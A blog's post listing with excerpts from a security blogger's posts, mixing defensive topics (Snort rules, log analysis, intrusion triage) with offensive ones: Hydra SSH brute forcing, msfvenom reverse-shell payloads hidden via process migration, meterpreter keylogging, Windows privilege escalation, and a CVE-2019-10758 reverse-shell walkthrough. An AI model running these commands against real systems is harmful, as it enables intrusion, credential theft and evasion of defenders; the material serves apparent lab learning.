- 博客(35)
- 收藏
- 关注
RSS订阅原创 开源入侵检测系统—Snort检测NMap扫描和SQL注入
前两篇我们完成了对Snort的安装、配置,了解了Snort配置为 IDS 的基本使用这一篇讲一讲 Snort 如何对 Nmap扫描和 SQL 注入进行检测检测Nmap扫描1、NMAP Ping扫描规则vim /etc/snort/rules/local.rules##下面的规则都写入这个文件中alert icmp any any -> 192.168.43.97 any (msg: "NMAP ping sweep Scan"; dsize:0;sid:10000001; rev: 1
2021-10-18 22:55:19
6386
3
原创 开源入侵检测系统—Snort的配置与检测规则编写
IDS(入侵检测系统)模式配置1、创建snort用户和组,其中snort为非特权用户groupadd snortuseradd snort -r -s /sbin/nologin -c SNORT_IDS -g snort2、配置目录IDS 模式运行时会创建一些目录,其中配置文件储存在 /etc/snort 中,规则储存在 /etc/snort/rules中,编译规则储存在 /usr/local/lib/snort_dynamicrules 中,日志粗存在 /var/log/snort 中#创
2021-10-18 22:48:14
7511
原创 开源入侵检测系统—Snort安装
Snort是一个多平台(Multi-Platform),实时(Real-Time)流量分析,网络IP数据包(Pocket)记录等特性的强大的网络入侵检测/防御系统(Network Intrusion Detection/Prevention System),即NIDS/NIPS。安装系统:虚拟机CentOS7首先安装 web 服务组件 LAMPApache#apacheyum install httpd httpd-devel#启动ahachesystemctl start httpd#
2021-10-18 22:40:20
4574
1
原创 开源蜜罐——HFish搭建
开源蜜罐HFishHFish由控制端和节点端组成,控制端用来生成和管理节点端,并接收、分析和展示节点端回传的数据,节点端接受控制端的控制并负责构建蜜罐服务。蜜罐可以部署再外网,将节点部署在互联网区,用来感知互联网来自自动化蠕虫、竞争对手和境外的 真实威胁,甚至发现针对客户的 0day攻击,通过和具有情报生产能力的 情报平台 对接,可以稳定准确的生产私有威胁情报。部署在内网,是企业环境 最常见 的使用方法,用来捕捉内网已经失陷、勒索软件和恶意行为,重点在于 敏捷准确,具体可细分为 内部办公场景 和 内部
2021-10-17 20:53:01
7975
2
原创 渗透工具——Hydra破解弱密码
Hydra是一个自动化爆破工具,暴力破解弱密码,是一个支持众多协议的爆破工具,kali中以集成。1.对ssh进行爆破hydra -L user.txt -P password.txt ssh://192.168.3.163-s 指定端口hydra -L user.txt -P password.txt ssh://192.168.3.163 -s 77442.将破解密码保存到指定文件hydra -L user.txt -P password.txt ssh://192.168.3.163
2021-10-14 09:46:48
955
原创 应急响应——Web日志分析
Web日志Web访问日志记录了Web服务器接收处理请求及运行时错误等各种原始信息。通过对WEB日志进行的安全分析,不仅可以帮助我们定位攻击者,还可以帮助我们还原攻击路径,找到网站存在的安全漏洞并进行修复。Web日志格式218.19.140.242 - - [10/Dec/2010:09:31:17 +0800] “GET /query/trendxml/district/todayreturn/month/2009-12-14/2010-12-09/haizhu_tianhe.xml HTTP/1.1
2021-09-17 11:43:01
4394
原创 应急响应——Linux日志分析
Linux系统中日志存放位置/var/log/不同linux发行版的该目录下的其他日志位置可能不同,具体情况具体分析查看日志配置情况: cat /etc/rsyslog.conf/var/log/目录下,所有日志情况比较重要的几个日志:登录失败记录:/var/log/btmp //lastb最后一次登录:/var/log/lastlog 或者 //lastlog登录成功记录: /var/log/wtmp //last
2021-09-16 21:08:46
1079
原创 应急响应——Windows日志分析
Windows系统日志记录系统中硬件、软件和系统问题的信息,同时还可疑监控系统中发生的事件、用户可疑通过它来检查错误发生的原因,或者寻找收到攻击时攻击者留下的痕迹(但日志也有可能被攻击者删除或伪造)Windows日志分类:应用程序日志、系统日志、安全日志系统日志记录着操作系统组件发生的事件,主要包括驱动程序、系统组件和应用软件的崩溃以及数据丢失错误等。系统日志中记录的时间类型由Windows NT/2000操作系统预先定义。默认位置: %SystemRoot%\System32\Winevt\L
2021-09-16 19:06:21
2879
原创 应急响应——Linux入侵排查
事件响应可以定义为每当发生计算机或网络安全事件时所采取的行动过程。作为事件响应者,您应该始终了解系统中应该出现和不应该出现的内容。排查思路(1)首先监测用户账号安全,比如新增的账号、可疑账号,重点查看可以远程登录的账号以及高权限账号。(2)利用linux的history指令查看历史linux指令,uptime指令查看登录多久、多少用户。(3)检查异常端口和进程,netstat检查异常端口,ps检查异常进程,可以观看资源占用的进程id来判断是否有挖矿木马等嫌疑。(4)检查linux的启动项和系统的
2021-09-16 16:41:26
8500
原创 Windows、Linux密码破解—John、Hydra、hashcat、Mimikatz等工具基本使用
密码破解字典https://github.com/danielmiessler/SecListsLinux密码破解在linux中,密码放在/etc/passwd和/etc/shadow中,如果我们读取到了加密密码,就可以复制下来对其进行破解。cat /etc/passwdcat /etc/shadowjohn the ripper加密密码破解字典:https://github.com/danielmiessler/SecLists/blob/master/Passwords/Leak
2021-09-16 15:29:36
3198
原创 端口渗透—23端口Telnet
Telnet是一种默认不加密的不安全协议,可以通过它连接到本地网络中的其他系统。Telnet远程登录telnet 192.168.0.124获取Telnet服务版本 nmap -sV -p23 <ip>MITM:远程登录欺骗通过metasploit的 auxiliary/server/capture/telnet模块在本机上设置一个虚假的telnet服务,通过钓鱼使其登录此telnet服务,一旦其尝试登录此虚假的telnet服务,我们就可以获取到他的登录凭证。这种和钓鱼有异曲同
2021-09-15 19:23:27
5473
1
原创 端口渗透——21端口FTP
21端口开启的服务FTP代表文件传输协议,其用于在计算机网络上的客户端和服务器之间传输文件。默认端口是21,当共享数据时会被打开。枚举ftp服务的版本信息nc -vn <ip> 21获取FTP证书(如果存在)openssl s_client -connect <ip>:21 -starttls ftp匿名登录文件可以被隐藏,所以匿名登录可能看不到文件ftp <ip>>anonymous>anonymous>ls -a浏览器连
2021-09-15 18:16:19
8202
原创 Metasploit渗透——msfvenom隐藏恶意进程
我们上传了msf马后并不是万无一失的,msf马创建的进程极有可能被防御设备发现,发出警报并采取措施终止进程,我们的会话也会被终止。因此,我们有必要将创建的msf马进程迁移到目标及正在运行的进程中,这样受害者就无法找到恶意进程,从而定位到恶意软件的位置了。第一种方法通过使用 PrependMigrate参数使生成的可执行文件隐藏在名为explorer.exe的进程后面。msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.0.109 lpor
2021-09-15 17:45:59
831
1
原创 Metasploit渗透——msfvenom生成shell速查
接受反弹shelluse exploit/multi/handlerset payload <payload name> #和下面的反向shell制作的载荷相同set LHOST <本机地址>set LPORT <本机监听端口>set ExitOnSessio false #可以让建立监听的端口继续保持监听,可接受多个sessionexploit -j -z #-j为后台任务,-z为持续监听Msfvenom载荷制作命令生
2021-09-15 13:50:23
590
原创 Metasploit渗透——meterpreter基础命令
Meterpreter系统信息sysinfo用户标识getuid获取权限getsystem当前目录pwd列举进程ps键盘记录##扫描远程计算机键盘活动keyscan_start##显示远程计算机键盘活动keyscan_dump##停止扫描远程计算机键盘活动keyscan_stop显示驱动器show_mount截屏保存远程PC的屏幕截图screenshot从kali上传文件upload /root/abc.exe C:\\system32
2021-09-15 11:51:18
276
原创 Windows Server2012上无法安装VMware Tools
在VMware中搭建Windows Server2012时碰到的问题,无法安装VMware Tools,意味着无法向虚拟机中做拽任何文件,这无疑是令人很难受的。废话不多说,说说我通过Google搜索到的解决办法原因可以看微软官方发布的原因,说实话并没有看懂,但不妨碍我们解决问题https://docs.microsoft.com/en-us/troubleshoot/windows-server/deployment/error-install-vmware-driver解决方法简单点讲,
2021-09-13 20:00:38
5610
原创 Windows提权—进程注入、Unattended Installs提权
进程注入提权使用 pinjector.exe 注入到system用户的进程中,使该进程绑定在0.0.0.0:port ,并建立监听端口,攻击者从攻击机上主动连接该地址,获取到系统的system权限注入进程提权相当于开启了一个后门, 隐蔽性极高,不会创建新的进程,很难发现下载pinjector.exehttps://www.tarasco.org/security/Process_Injector/index.html上传 pinjector.exe到靶机可执行目录##列取所有进程pinje
2021-09-12 18:11:05
996
原创 windows提权—烂土豆(RottenPotato)及Juicy Potato提权
介绍烂土豆(Rotten Potato) MS16-075 提权是一个本地提权,只针对本地用户,不支持域用户适用版本:Windows 7、8、10、2008、2012烂土豆下载地址:https://github.com/foxglovesec/Potato烂土豆提权原理:欺骗 “NT AUTHORITY\SYSTEM”账户通过NTLM认证到我们控制的TCP终端。对这个认证过程使用中间人攻击(NTLM重放),为“NT AUTHORITY\SYSTEM”账户本地协商一个安全令牌。这个过程是通
2021-09-11 21:44:35
14870
原创 windows提权—msf、at、sc提权
msf提权适用版本:windows 2k3、xp获取到服务器的 meterpreter 后,有三个方向getsystem提权可以直接使用 getsystem 提权没成功绕过UAC策略MSF使用注册表 bypass uac 提权漏洞模块:exploit/windows/local/askexploit/windows/local/bypassuacexploit/windows/local/bypassuac_injection操作:use exploit/window
2021-09-10 18:04:51
719
原创 windows—令牌窃取
令牌的定义令牌是描述进程或者线程安全上下文的一个对象。不同的用户登录计算机后, 都会生成一个Access Token,这个Token在用户创建进程或者线程时会被使用,不断的拷贝,这也就解释了A用户创建一个进程而该进程没有B用户的权限。一般用户双击运行一个进程都会拷贝explorer.exe的Access Token。Windows下的访问令牌分为:* 授权令牌(Delegation token):交互式会话登陆(例:本地用户登陆、用户桌面等)* 模拟令牌(Impersonation token):非
2021-09-10 15:28:31
1482
原创 docker运行web容器及容器互连
本文使用docker容器构建一个两个应用,并简单介绍了以下容器互通的方法运行web应用方法docker pull tomcatdocker run -d -p 8081:8080 tomcat ##绑定到主机8081端口#或者绑定到随机端口docker run -d -P tomcat docker run -itd -p 8080:8080 --name tomcat tomcat## -p是指定容器端口绑定在主机端口## -P是容器内部端口随机映射到主机的高端口## -i表示
2021-09-09 20:44:16
379
原创 CentOS7上安装MongoDB及基础命令学习
安装MongoDB安装各个Linux平台依赖包> ##Red Hat/CentOS > sudo yum install libcurl openssl> > ##Ubuntu 18.04 LTS ("Bionic")/Debian 10 "Buster" > apt-get install libcur14 openssl> > ##Ubuntu 16.04 LTS ("Xenial")/Debian 9 "Stretch" > apt-g
2021-09-09 17:11:19
1030
1
原创 docker自动化安装及基本使用
本文docker安装采用官方便携脚本进行自动化安装和apt-get安装两种方法推荐使用第二种方法,下载较快自动化安装docker使用便携脚本在CentOS7安装docker其他发行版linux安装方法见官方文档:https://docs.docker.com/engine/install/centos/#install-using-the-convenience-script从get.docker.com下载脚本并运行,以在Linux上安装Docker最新稳定版注:docker安装运行
2021-09-09 12:02:11
326
原创 MongoDB未授权访问漏洞复现及docker.mongodb下--auth授权验证
MongoDB未授权访问漏洞危害MongoDB服务开放在公网上时,若未配置访问认证授权,则攻击者可无需认证即可连接数据库,对数据库进行任何操作(增、删、改、查等高危操作),并造成严重的敏感泄露风险。漏洞成因MongoDB服务安装后,默认未开启权限认证,且服务监听在0.0.0.0.,会造成远程未授权访问漏洞在mongo数据库服务监听在0.0.0.0的情况下,若未在admin数据库中添加任何账号,且未使用–auth参数启动mongoDB服务,则会造成未授权访问(二者缺一不可)。只有添加在admin中添
2021-09-08 18:33:59
3442
原创 mongo-express远程代码执行(CVE-2019-10758)漏洞复现(msfvenom/wget,反弹shell)
mongo-expressmongo-express是一个MongoDB的Admin Web管理界面,基于NodeJS、Express、Bootstrap3开源编写漏洞介绍在开启了端口8081后,攻击者可以直接访问,而目标服务器上没有修改默认的登录密码admin/pass,则攻击者可以远程执行node.js代码复现环境mongo-express 0.53.0 MongoDB Version 3.4.24漏洞环境搭建采用github开源docker漏洞环境搭建而成项目地址:https:/
2021-09-07 22:27:26
4126
2
原创 Linux提权——SUDO
使用Sudo权限提升Linux账户权限在Linux/Unix中,/etc/sudoers文件是sudo权限的配置文件,其中储存了一些用户或组可以以root权限使用的命令。如下图Sudoer文件语法假如我们(root用户)要给普通用户test分配sudo权限,请输出vim /etc/sudoers打开文件进行编辑,找到root权限root ALL=(ALL:ALL) ALL,在下一行输入test ALL(ALL:ALL) ALL,保存后退出,这样即表示用户test可以使用sudo调用root权
2021-09-03 21:52:04
9165
原创 应急响应——Windows入侵排查
Windows安全应急处置从以下方面进行排查windows主机1.是否有异常进程、用户2.异常的服务、计划任务、启动项3.注册表信息4.端口开放情况5.文件及文件共享6.防火墙设置7.异常会话8.日志9.其他10.工具进程获取系统上正在运行的所有进程列表,可以根据以下内容查找可疑进程CUP、内存占用率长时间过高的进程没有签名或描述信息的进程非法路径的进程 进程的属主也可以使用某些软件,如D盾_web查杀工具,微软的Process Explorer工具等进行排查#
2021-09-03 21:00:34
2155
原创 配置WindowsServer2003服务器iis站点时踩到的坑
server2003服务器iid搭建站点教程见:https://blog.csdn.net/zhangliu463884153/article/details/80029060记录一下在搭建过程中踩到的坑:服务器版本:Windows Server 2003 SP2 Enterprise Editionh + IIS6.01.添加iis组件时提示:无法安装IIS组件windows Server 2003 Enterprise Edition Pack 3 CD解决办法:点击 虚拟机->可
2021-06-20 20:35:29
254
原创 边打XXE-lab边学习(一)
一、简介及靶场搭建简介XXE(XML External Entity Injection)即XML外部实体注入。漏洞是在对非安全的外部实体数据进行处理时引发的安全问题。XXE原理XXE即XML外部实体注入 。我们先分别理解一下注入和外部实体的含义。注入:是指XML数据在传输过程中被修改,导致服务器执行了修改后的恶意代码,从而达到攻击目的。外部实体:则是指攻击者通过利用外部实体声明部分来对XML数据进行修改、插入恶意代码。所以XXE就是指XML数据在传输过程中利用外部实体声明部分的“SYSTEM
2021-06-19 13:48:24
5381
2
原创 代码审计——filter_var函数
这里写目录标题红日安全代码审计——day2源码分析linux下的利用windows下的利用红日安全代码审计——day2原项目地址:https://github.com/hongriSec/PHP-Audit-Labs/blob/master/Part1/Day2/files/README.md本文是对day2课后习题的解题及学习// index.php<?php $url = $_GET['url'];if(isset($url) && filter_var($url,
2021-06-11 17:13:17
1230
4
原创 代码审计—红日安全day1,in_array()和make_set函数
红日安全代码审计——day1地址:https://github.com/hongriSec/PHP-Audit-Labs/blob/master/Part1/Day1/files/README.mdin_array()函数的缺陷先来看看in_array()的定义:in_array — 检查数组中是否存在某个值in_array ( mixed $needle , array $haystack [, bool $strict = FALSE ] ) : bool大海捞针,在大海(haystack)
2021-06-10 16:47:33
438
原创 DC-4靶场练习—teehee提权
DC系列第四个靶机下载地址:https://www.vulnhub.com/entry/dc-4,313/老规矩先扫描以下局域网内的主机iparp-scan -l扫一下端口:nmap -A -p- 192.168.1.101只看放了22和80端口,先进80端口看看有什么只有一个表单,猜测Username应该是admin,先不急着爆破。用dirsearch扫了一下目录,只有一个登录界面:所以现在只能从80或22端口找突破口了,22端口需要同时爆破账号和密码,太麻烦而且也不知道能不
2021-06-09 16:04:11
652
原创 DC-3靶机—linux内核提权
(闲话,vm挺好,但占用内存大且有时候莫名其妙的工具连不上网络.vbox挺轻便的,但是增强设备也安装不上去,文件和主机无法互通,难道一个后门木马我手打?)靶场:DC-3下载地址:https://www.five86.com/dc-3.html先扫描以下局域网内存货主机:arp-scan -l端口:nmap -A -p- 192.168.1.101发现只开放了80端口,访问试试:作者提醒我们这个靶机只有一个flag和一个进入点,没有线索提示我们发现nmap扫描出此站点是由joom
2021-06-07 23:37:40
568
1
原创 DC-2靶场-渗透测试
靶机:DC-2下载地址:https://www.vulnhub.com/entry/dc-2,311/下载后导入和kali相同的虚拟机平台即可靶场的网络模式设置为桥接模式,启动1.先以ARP扫描以下局域网内靶机的iparp-scan -lnetdiscover、nmap、msf、powershell等常用工具也可以进行主机扫描,感兴趣可自行摸索2.使用nmap扫一下ip查看端口开放nmap功能很强大,不仅能够扫描端口,嗅探所提供的网络服务、还能探测存货主机、简单漏洞扫描和绕过防火墙
2021-06-06 18:23:16
723
1
原创 DC-1靶场练习
靶机 DC-1下载地址:https://www.vulnhub.com/entry/dc-1,292/将靶机拖入虚拟机运行,打开即可上来先用kali中的工具扫描以下局域网中的ip#ip addr#arp-scan -lor#netdiscover -r 192.168.1.0/24 -i eth0知道靶机ip后,nmap扫一下端口nmap -A -p- 192.168.1.101看到22、80、111端口和其详细信息,了解到该网站由drupal7搭建先访问80端口看看没有发现
2021-06-05 15:54:52
172
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人